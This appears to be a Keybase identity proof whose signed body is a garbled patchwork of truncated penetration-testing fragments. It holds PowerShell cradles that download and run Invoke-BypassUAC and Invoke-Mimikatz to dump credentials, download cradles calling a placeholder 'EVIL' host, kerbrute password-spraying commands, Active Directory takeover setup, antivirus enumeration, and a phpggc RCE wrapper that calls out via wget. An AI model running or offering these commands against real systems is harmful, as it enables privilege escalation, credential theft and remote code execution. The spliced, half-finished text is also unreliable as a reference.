anshuman_k
I hereby claim:
- I am anshumansrivastavagit on github.
- I am anshuman_k (https://keybase.io/anshuman_k) on keybase.
- I have a public key ASAx2rCSwxbDW1J_nbtTVWmX6Nt2c74ntGcZ20luUH7txQo
To claim this, I am signing this object:
#!/usr/bin/env bash
# Script to quickly and easily create non-meterpreter payloads for the OSCP
# @m8sec
# Note: It is recommended to create a new directory before running this
# script. All payloads will be placed in the current directory
IP="127.0.0.1" # <YOUR IP HERE>
PORT=443 # You may have to change this if there are outbound restrictions on the target ;)
#!/usr/bin/env bash
# Author: m8r0wn
# Description: Uses the Linux net commands to lookup a user in Active Directory
# This is the Linux equivalent of: net user [Username] /domain
# Usage: ./aduser_lookup.sh [username] [password] [DC-Server] [Lookup-User]
if [ -z "$1" ]; # quote the test so an empty first argument is handled correctly
then
    printf '[-] Usage: %s Username Password DC_Server username_to_lookup\n' "$0"
    exit 1
fi
[+] Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
#Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
#Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
#Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
#!/bin/bash
# phpggc wrapper that automatically generates payloads for RCE gadgets
function="system"
command="wget http://your.burpcollaborator.net/?"
# modify the options below depending on your use case
options="-a -b -u -f"
# generate gadget chains